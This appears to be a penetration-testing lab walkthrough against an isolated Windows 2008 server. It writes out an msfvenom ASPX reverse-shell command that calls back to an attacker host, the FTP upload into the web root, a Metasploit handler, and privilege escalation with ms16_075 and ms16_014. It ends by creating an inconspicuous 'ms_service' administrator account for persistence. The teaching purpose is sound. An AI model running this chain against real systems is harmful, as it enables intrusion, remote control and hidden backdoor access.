solved:  Take a screenshot of the Windows 2008 logon screen. You can log in to the ms_service account if you

1. Perform a port scan against the Windows 2008

In this part, you use Nmap
-sV option. This option detects the version of the service running behind the open port. The scan will take a bit longer than the command without this parameter.

You can compare the durations and the outputs of the two commands below.

nmap 192.168.2.11 -n

nmap 192.168.2.11 -n -sV

2. Check FTP server for anonymous login

Command

Notes

nmap 192.168.2.11 -n –script ftp-anon -p 21

You performed this in Lab-5, Section-6, against another server (Metasploitable).

3. Check the configurations of FTP and HTTP services

Open the Firefox browser and check the web page served by Windows 2008 by entering the server’s IP to the browser.

Connect to the FTP server by using the Anonymous user. Check the files once you logged in by
dir command. (Nmap script in Step-2 showed the same files and folders)

Did you realize that Web and FTP services are using the same home folder?

Think about this scenario: What if you can upload a shell file using the FTP service, and call that file from the Web application.

4. Create an ASPX reverse shell on Kali Linux

You will use msfvenom to create an ASPX reverse shell. Server operating systems usually have 64-bit architecture so that you will be making a 64-bit payload for the exploitation.

Commands

Notes

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.10 lport=443 -f aspx > reverseshell.aspx

reverseshell.aspx will be created.

5. Upload the ASPX file to the Windows 2008

Upload the file to the Windows 2008 server by using the FTP service

6. Prepare a handler on Kali Linux

An ASPX reverse shell on its own does not allow you to connect to the remote server (Windows 2008). There should be a corresponding handler that will respond to the ASPX reverse shell’s connection request and send commands to the reverse shell. A handler can be regarded as a command and control server. The reverse shell is like the RC car, but it is only the car. The handler is the remote-control unit. Neither of them will work alone. In this analogy, the RC unit’s frequency should be compatible with the frequency of the receiver in the car. Similarly, the parameter of the handler you are creating should be in full harmony with the parameters of the ASPX shell.

msfconsole

This command opens the Metasploit Framework.

use exploit/multi/handler

Use a multi/handler, which is a stub that handles exploits launched outside of the framework. (In this case, it was the reverseshell.aspx file)

setg payload windows/x64/meterpreter/reverse_tcp

Use reverse_tcp payload for this handler. Note that you used
set command in Project-1; however, you are using
setg in this project. setg is used to set options
globally. This option and the following options can be used by any module loaded later on.

setg lhost 192.168.2.10

Set global local host as 192.168.2.10

setg lport 443

Set global local port as 443

exploit or
run

Both commands will do the same thing and run the multi/handler

7. Call the ASPX reverse shell by using Firefox browser (
ASPX will run on the web application and communicate with the handler on Kali Linux). Check that the ASPX reverse shell connects to the handler and check you get a shell from Window 2008

Commands/Actions

Notes

Call the reverse shell file you uploaded by using the Firefox browser on Kali Linux

You did a similar thing in Project-1.

Check the “meterpreter session opened” message appeared on the handler window after you called the reverse shell

–

Shell

Type this to get the shell from Windows 2008. After typing “shell”, you will see the command prompt of the Windows 2008 server.

whoami

It should be “iis apppoolasp.net v4.0 user”

This is not a regular user account; instead this is a service account associated with the web service

Take a screenshot of the user account.

Let’s try to do some actions that require privileged access.

8. Confirm that shell is a low-privileged shell

Commands

Notes

net user ms_service mypass123 /add

Try to add a user named ms_service (login name)

cd ..

Go to system32 directory

cd config

Try to enter the config directory where critical files are stored.

dir

See the files in the system32 folder.

del wmi.dll

Try to delete a file under system32

This is an unprivileged shell. It is something like a “read-only” shell.

exit

Exit from the command prompt of Windows 2008.

Important note: This may kill the low-privilege shell on Metasploit, resulting in this message:
“192.168.2.11 – Meterpreter session # closed. Reason: Died”

In this case, you will see
msf5 exploit(multi/handler) > prompt instead of
meterpreter > prompt.

If this is the case, please proceed with the following two steps.

If this is
NOT the case, then go directly to the
Step-9.

exploit or
run

Run the multi/handler again.

Call the reverse shell (reverseshell.aspx) you uploaded by using the Firefox browser

So that you will be able to reopen the shell

9. Try to escalate privilege

Commands

Notes

background

Send the existing shell to the background.

Important: Make a note of the shell’s session ID

search suggester

This is an informational search command. Search the privilege escalation module in Metasploit

use post/multi/recon/local_exploit_suggester

You will use this local exploit suggester

show options

See the options of the suggester module. It takes the Session ID as a parameter.

set session #

You should replace the # symbol with the session ID number of the shell you sent to the background at the beginning of Step-9.

exploit or
run

Run the local_exploit_suggester module to find local exploits. This command will take a little time to show the results (10 secs).

At this time, the local_exploit_suggester module will use the shell you sent to the background and try to find exploitable local vulnerabilities. The low privilege level on the shell will be sufficient to find exploitable local vulnerabilities.

use exploit/windows/local/ms16_075_reflection

You are lucky that the suggester module suggests many exploits. You will try them until you get a high-privileged shell.

Select ms16_075_reflection exploit first to try privilege escalation

show options

After this command, you will see the global options you set in Step-6 (ms16_075 will use the values set for lhost and lport during exploitation)

set session 1

This is the session you sent to the background.

Run

Run the selected exploit.

Metasploit will try to exploit Windows 2008 to gain a high-privileged shell remotely. Metasploit will use the privileges of the
“iis apppoolasp.net v4.0 user” user.

You should get the message below:

Meterpreter session # opened

192.168.2.10:443 -> 192.168.2.11:some_port

Congrats! You get a shell!

Note that Session # will be one more than the session number you sent to the background.

shell

Get the shell from Windows 2008. You will see the command prompt of the Windows 2008 server.

whoami

Sigh. This is still an unprivileged shell!

exit

Exit from the command prompt of Windows 2008.

10. Escalate privilege

background

Notice that now the session created by ms16_07_reflection exploit is in the background. There are two unprivileged sessions in the background.

use exploit/windows/local/ms16_014_wmi_recv_notif

Select another exploit module to try the privilege escalation. (When you go up in the terminal window, you will see this is one of the exploits among the list of local_exploit_suggester output)

show options

Just check the lhost and lport parameters

set session #

Which session number should be here? The session number of the session you sent to the background earlier or later?

The answer is Earlier.

Because you are using the exploits suggested for the earlier session by the local_exploit_suggester.

Run

Run the selected exploit.

Metasploit will try to exploit Windows 2008 to gain a high-privileged shell remotely. Metasploit will use the privileges of the
“iis apppoolasp.net v4.0 user” user.

You should get the message below:

Meterpreter session # opened

192.168.2.10:443 -> 192.168.2.11:some_port

You get a shell once again!

Note that you will see a new session number here.

shell

Get the command prompt of Windows 2008 to the Metasploit window.

whoami

Congrats! You have the highest possible privilege that one can have in a Windows operating system.

Take a screenshot of the terminal window.

11. Create an Administrator account on Windows 2008

Commands/Actions

Notes

net user ms_service mypass123 /add

Now, you will do things to maintain access (persistence). Even if the system admin patches the computer, you will have an administrator account.

You will create a user name named ms_service. This name is selected on purpose, not to attract attention.

net localgroup administrators ms_service /add

Add this user to the Administrators group

Switch to Windows 2008

Switch to Windows 2008 on Netlab

Log in with administrator / aA12345

Click on the Start icon > Administrative Tools > Computer Management > Local Users and Groups > User

You will see the ms_service account here

Click on the Start icon > Logoff

See the ms_service on the login screen.

Take a screenshot of the Windows 2008 logon screen.

You can log in to the ms_service account if you want.